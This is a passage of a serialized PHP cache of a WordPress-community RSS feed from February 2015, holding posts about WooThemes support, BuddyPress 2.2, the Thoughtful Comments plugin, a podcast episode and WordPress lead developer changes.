\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Real NFL Scandal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44652\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/real-nfl-scandal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1108:\"<blockquote><p>Seattle’s decision to throw the ball at the goal line with 20 seconds to go in last night’s Super Bowl was a costly one. But in the long run, it won’t be nearly as costly to the rest of the United States as the National Football League (NFL) itself.</p>\n<p>Every year, the NFL rakes in around $9.5 billion in revenue. Its commissioner, Roger Goodell, meanwhile, has an annual salary of $44 million. And while those numbers might make sense for any big business, the NFL isn’t a business – not technically, at least.</p>\n<p>According to the Public Law 89-800, it’s a 501(c)6 tax-exempt nonprofit. That’s right, a nonprofit. In other words, the NFL, one of the most lucrative organizations in all of sports, is subsidized by you and me the taxpayers.</p></blockquote>\n<p>From <a href=\"http://www.truth-out.org/opinion/item/28885-the-real-nfl-scandal\">The Real NFL Scandal</a>. If you’re curious, here’s a <a href=\"http://en.wikipedia.org/wiki/Category:501(c)(6)_nonprofit_organizations\">list of other notable 501(c)(6) organizations</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 00:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Why WooThemes is Smart to Discontinue Its Twitter Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38563\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wptavern.com/why-woothemes-is-smart-to-discontinue-its-twitter-support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3992:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg\" rel=\"prettyphoto[38563]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg?resize=1025%2C495\" alt=\"woo-support-twitter-account\" class=\"aligncenter size-full wp-image-38610\" /></a></p>\n<p>WooThemes <a href=\"http://www.woothemes.com/2015/02/retiring-woosupport-twitter/\" target=\"_blank\">announced</a> this week that it will be retiring @WooSupport, its Twitter support account, in favor of other support channels. Social media manager Marina Pape reports that support at the company is otherwise healthy. “On the contrary, our support is cooking with Customer Happiness this week averaging 90%, all support teams coming in under 24 hours for first-reply time,” she said.</p>\n<p>WooThemes, like many other WordPress product and service providers, had expanded channels to try to offer support on as many different social channels as possible. Last October, the company <a href=\"http://www.woothemes.com/2014/10/glimpse-world-woosupport/\" target=\"_blank\">announced</a> changes in its support structure:</p>\n<blockquote><p>We’re opening more and more avenues of communication like the Community, the @WooSupport Twitter handle, and a streamlined Knowledge Base, as well as actively monitoring our social media and ideas boards. You name it, we’re working on it.</p></blockquote>\n<p>Over the past several months, WooThemes has discovered that offering Twitter support is more trouble than it’s worth. “Questions get technical and DMs and 140 characters are not ideal facilitators of such things,” Pape said in the announcement.</p>\n<p>“Yes, we want to encourage conversation. Yes, we want to have an ear to the ground and be able to help people when the rubber hits the road for them and escalate tickets if people have been waiting for unusually long periods,” she said. <strong>“But the truth of the matter is Twitter is not the place to handle support queries and when we try we shoot ourselves in the collective foot.”</strong></p>\n<p>WooThemes is making a smart move to pull back from a medium that wasn’t built to handle complex support queries. Instead of spreading staff thin over every social avenue, the company is concentrating on channeling users through an established ticketing system that is already working.</p>\n<p>While anyone can use Twitter for whatever purpose, within its 140 character limit, the brevity that the medium was designed for is not a good fit for managing support. If users find frustration in communicating within Twitter’s limited capacity, support on this channel is a waste of company time and resources.</p>\n<p>“But after letting @WooSupport run for a while, we realized what it was actually doing was creating an expectation that we never intended to meet which was that we were able to actually give support over Twitter,” Pape explained. <strong>“140 characters are not enough to talk about the weather let alone why your custom-built-million-moving-parts website is breaking.”</strong></p>\n<p>WooThemes is opting to limit support to its ZenDesk ticketing system, instead of having social media managers playing middleman via tweets. “DMs on Twitter to get details and sort out problems is akin to birthing pineapples,” Pape said. Encouraging the ticketing system as the primary avenue of support is a move toward greater efficiency.</p>\n<p>WordPress hosting companies and product/service providers would do well to examine how they are using their various social channels and whether or not some could be trimmed back in favor of more suitable mediums for communication. Cutting out Twitter support may not be the answer for every product or customer demographic, but being “always on” and “always available” via every channel is not a realistic approach to support.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 20:56:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: Thoughtful Comments Plugin Adds Comment Moderation Links to the Frontend of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://wptavern.com/thoughtful-comments-plugin-adds-comment-moderation-links-to-the-frontend-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3054:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38557\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png?resize=669%2C348\" alt=\"Thoughful Comments Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/98640399@N08/9410826173\">GirlOnRail_BKGs_BartaIV 1024×768</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The backend of WordPress has a set of tools to help administrators moderate comments, but what if you could bring some of those tools to the frontend? Developed by <a title=\"http://foliovision.com\" href=\"http://foliovision.com\">Foliovision</a>, <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">Thoughtful Comments</a> is compatible with Jetpack Comments and adds the following links to comments on the frontend of WordPress:</p>\n<ul>\n<li>Approve</li>\n<li>Delete</li>\n<li>Delete Thread</li>\n<li>Delete and Ban IP</li>\n<li>Delete Thread and Ban IP</li>\n</ul>\n<p>Usernames highlighted in red indicate a comment that’s in the moderation queue. You can either approve, delete, or delete and ban the IP address of moderated comments. It’s important to note that deleted comments are sent to the trash instead of being removed completely from WordPress. For this reason, I think the Delete link should be renamed to Trash so its function makes more sense.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38554\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png?resize=708%2C293\" alt=\"Comment in Moderation Status\" /></a>Comment in Moderation Status\n<p>You can also delete entire threads.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38555\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png?resize=640%2C267\" alt=\"Various Administration Links\" /></a>Various Administration Links\n<p>Editing posts, administering comments, and managing a site from the frontend is a huge time saver. With <a title=\"https://wordpress.org/plugins/wp-front-end-editor/\" href=\"https://wordpress.org/plugins/wp-front-end-editor/\">certain aspects of WordPress</a> making their way to the frontend, I wouldn’t be surprised if one day, the features within Thoughtful Comments end up in core. In the future, I think users will expect to be able to accomplish specific tasks like these without having to browse through clunky administration screens.</p>\n<p>Thoughtful Comments is compatible with WordPress 4.1 and available from the <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">WordPress plugin directory</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 18:33:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: WPWeekly Episode 178 – A Conversation With Frenemy Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=38572&preview_id=38572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://wptavern.com/wpweekly-episode-178-a-conversation-with-frenemy-brian-krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3687:\"<p>In this episode of WordPress Weekly, <a title=\"http://marcuscouch.com/\" href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by the founder of <a title=\"https://poststatus.com/\" href=\"https://poststatus.com/\">PostStatus</a>, Brian Krogsgard. He explains how his experience writing for WPCandy provided the foundation to launch PostStatus. We find out how well the <a title=\"https://poststatus.com/club/\" href=\"https://poststatus.com/club/\">PostStatus club</a> is doing since launching two weeks ago. Last but not least, we discuss whether or not Krogsgard has the right ingredients to be financially successful in the WordPress content business.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">Recap of PressNomics 3</a><br />\n<a title=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\" href=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\">Human Made Acquires Australian Based WordPress Agency Sennza</a><br />\n<a title=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\" href=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\">Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin</a><br />\n<a title=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\" href=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\">BuddyPress 2.2 Spumoni Released, Featuring New Member Type API</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/user-roles-and-capabilities/\" href=\"https://wordpress.org/plugins/user-roles-and-capabilities/\">User Roles and Capabilities</a> allows you to manage user roles and capabilities. Using this plugin, you can create new roles and delete existing roles.</p>\n<p><a title=\"https://wordpress.org/plugins/wp-style-kit/\" href=\"https://wordpress.org/plugins/wp-style-kit/\">WP Style Kit</a> is a plugin that adds additional features to the Custom Styles section of the Visual Editor. You can add beautiful custom styles such as, additional headlines, custom bullets, circles, quotes, and call out boxes.</p>\n<p><a title=\"https://wordpress.org/plugins/pet-adoption-listings/\" href=\"https://wordpress.org/plugins/pet-adoption-listings/\">Pet Adoption Listings</a> provides two easy ways to display listings of adoptable pets from a shelter’s profile at Adopt-a-Pet.com via an iframe.</p>\n<p><a title=\"https://wordpress.org/plugins/login-joomla-users/\" href=\"https://wordpress.org/plugins/login-joomla-users/\">Login Joomla Users</a> allows migrated users from Joomla to login to WordPress. Tested on WordPress 4.1 with users migrated from Joomla 2.5.9. After the first successful login, the password field will automatically be hashed by WordPress.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 11th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #178:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 17:33:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Great Doctorow Essay\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44631\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/great-doctorow-essay/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"<p>Cory Doctorow on <a href=\"http://www.wired.com/2014/12/government-computer-security\">How Laws Restricting Tech Actually Expose Us to Greater Harm</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 05:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: BuddyPress 2.2 Spumoni Released, Featuring New Member Type API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37925\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5548:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg?resize=1025%2C498\" alt=\"l-and-b\" class=\"aligncenter size-full wp-image-38537\" /></a></p>\n<p>BuddyPress 2.2 “<a href=\"https://buddypress.org/2015/02/buddypress-2-2-spumoni/\" target=\"_blank\">Spumoni</a>” was released today. The name pays tribute to<a href=\"http://www.spumonigardens.com/\" target=\"_blank\"> L&B Spumoni Gardens</a>, a 70 year old, family-owned pizza joint in Brooklyn, NY. This release is packed full of features that offer developers more flexibility in extending BuddyPress.</p>\n<h2>New Member Type API</h2>\n<p>BuddyPress 2.2 introduces a basic <a href=\"http://wptavern.com/buddypress-2-2-on-track-to-provide-a-basic-member-type-api\" target=\"_blank\">Member Type API</a> that developers can use to create different user types, i.e. student, teacher, etc. This new API is a huge step forward for building niche social networks on top of WordPress. It makes it possible to restrict content, filter the member directory, assign different permissions, etc., based on different member types.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png?resize=304%2C173\" alt=\"member-types\" class=\"aligncenter size-full wp-image-38546\" /></a></p>\n<p>The API does nothing visible for users in this first iteration but can be utilized to create plugins that register different member types and build out further capabilities from there. Admins will be able to change a user’s member type, which is currently limited to one, via a new meta box that is added to the community profile screen.</p>\n<h2>Custom Post Type Support Added to the Activity Stream</h2>\n<p>Custom post type support for the activity stream is a major feature that has been <a href=\"https://buddypress.trac.wordpress.org/ticket/3460\" target=\"_blank\">three years in the making</a>. Developers can now add support for their post types to be tracked in the activity stream in the same way that updates appear for regular posts via the blogs component. Adding support for CPTs is as simple as including one line of code:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">add_post_type_support( \'book\', \'buddypress-activity\' );</pre>\n<p>Note that this feature isn’t automatically turned on – a custom post type must declare support for it. The single line of code will add a generic update that can be further customized via arguments added when registering the post type. Comment support for CPT activity items is also optional.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png?resize=1025%2C326\" alt=\"cpt-activity\" class=\"aligncenter size-full wp-image-35302\" /></a></p>\n<p>Custom post types with activity stream support can then be easily sorted via the activity dropdown filters:</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png?resize=1025%2C366\" alt=\"activity-dropdown\" class=\"aligncenter size-full wp-image-35299\" /></a></p>\n<p>Check out the BuddyPress codex for more information on <a href=\"https://codex.buddypress.org/plugindev/post-types-activities/#adding-the-buddypress-support-and-specific-labels-at-post-type-registration\" target=\"_blank\">how to customize activity attributes</a> when registering a custom post type.</p>\n<p>This release also <a href=\"http://wptavern.com/buddypress-2-2-will-add-support-for-composer\" target=\"_blank\">adds support for Composer</a>. BuddyPress will soon be listed at <a href=\"https://packagist.org/\" target=\"_blank\">Packagist.org</a> now that the official release is out.</p>\n<p>Other notable features and improvements include:</p>\n<ul>\n<li>Several new query API’s (based on WordPress improvements) for retrieving more specific results</li>\n<li>Continued cache enhancements, particularly for multi-site and multi-network WordPress configurations</li>\n<li>Message Meta – Private message conversations are now more flexible with an additional metadata table</li>\n<li>The Activity and Extended Profiles components now support advanced conditional logic, like nested clauses and multiple operators — A AND ( B OR C ). The Activity component now also supports querying by multiple scopes.</li>\n<li>Mentions: Better support for responsive devices</li>\n<li>Improved UI for managing messages, new “Read/Unread” links for each message thread, better bulk message management</li>\n<li>Numerous improvements to the Legacy template pack</li>\n<li>Increased coverage of inline code documentation, actions, and filters</li>\n</ul>\n<p>Check out the full list of improvements on the <a href=\"https://codex.buddypress.org/releases/version-2-2/\" target=\"_blank\">2.2 version page</a> in the codex.</p>\n<p>BuddyPress 2.2 is the result of several months of hard work from 44 contributors. The new features in this release enable the plugin to be more flexible for building niche social networks with different user types and custom content types integrated into the activity stream. The official BuddyPress 2.2 update is now available via the WordPress admin.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 00:26:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Post Status: WordPress lead developer changes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8385\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://poststatus.com/wordpress-lead-developer-changes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4131:\"<p>Yesterday, <a href=\"https://make.wordpress.org/core/2015/02/03/new-lead-developers-helen-and-dion/\">it was announced</a> that Helen Hou-Sandí and Dion Hulse are now lead developers of the WordPress project. That announcement, we learned today, is tied to another: that Peter Westwood and Ryan Boren <a href=\"https://make.wordpress.org/core/2015/02/04/new-chapters-for-ryan-and-westi/\">are stepping down</a> from their lead developer roles.</p>\n<p>Peter and Ryan have been enormously influential on the project.</p>\n<p>Ryan Boren has been committing to the WordPress codebase for over 11 years (aka: since the beginning), and has more commits — 7,961 according to Open Hub — than anyone. Peter has been committing for 7 years, and has 1,261 commits to his name. However, a lead developer’s influence goes well beyond commit; they are the guardians of the project.</p>\n<p>Both Ryan and Peter have been more quiet lately than years prior. Andrew Nacin describes it like so:</p>\n<blockquote><p>For some time now, Ryan and Peter have avoided weighing in on technical matters. Very simply, when you aren’t able to be active in development, you know you’re not up to speed, and you realize your words shouldn’t carry the weight that they do. Being able to make this <a href=\"http://nacin.com/2014/02/07/how-wordpress-chooses-committers/\">judgment</a> is one of the things that makes both of them such great leaders.</p></blockquote>\n<p>Peter will step into an emeritus role:</p>\n<blockquote><p>Peter will be moving into a dormant/inactive/emeritus status. We hope to have him back when his life and work allows. In the meantime, you may see him committing a bug fix here and there, as he is wont to do.</p></blockquote>\n<p>Ryan has shifted his focus, however, and is concentrating fully on UX in WordPress:</p>\n<blockquote><p>Ryan has been focusing all of his energy on improving UX for more than a year, especially for mobile and touch devices, and especially for workflows like media management. So I’m pleased to say he’ll continue to do that:<strong>Ryan will be spearheading UX for WordPress in 2015.</strong> It’s been a while since we’ve had someone truly focusing on just UX, so this is really exciting.</p></blockquote>\n<p>With this shift, Helen and Dion are stepping into official roles to represent their enormous impact on the project over the last several years.</p>\n<p>(Note: this bit of the post will look familiar to Club members)</p>\n<p>Helen works for <a href=\"http://10up.com/\">10up</a>, a WordPress consulting agency, and spends nearly 100% of her time on the WordPress.org project. She <a href=\"https://make.wordpress.org/core/2012/12/18/commit-promotions/\">received commit access</a> in late 2012, at the beginning of the 3.6 release cycle. You can follow <a href=\"https://twitter.com/helenhousandi\">@helenhousandi</a> on Twitter, and <a href=\"http://helenhousandi.com/\">visit her website</a> as well.</p>\n<p>These are the first additions to the list of lead developers for WordPress since Andrew Nacin became a lead in 2012, before the WordPress 3.5 release.</p>\n<p>I asked Andrew Nacin how these decisions are made, and he responded with the following:</p>\n<blockquote>\n<p class=\"p1\"><span class=\"s1\">After each release, the lead developers review the current list of guest committers, potentially propose new committers, etc. Any proposals are finalized through 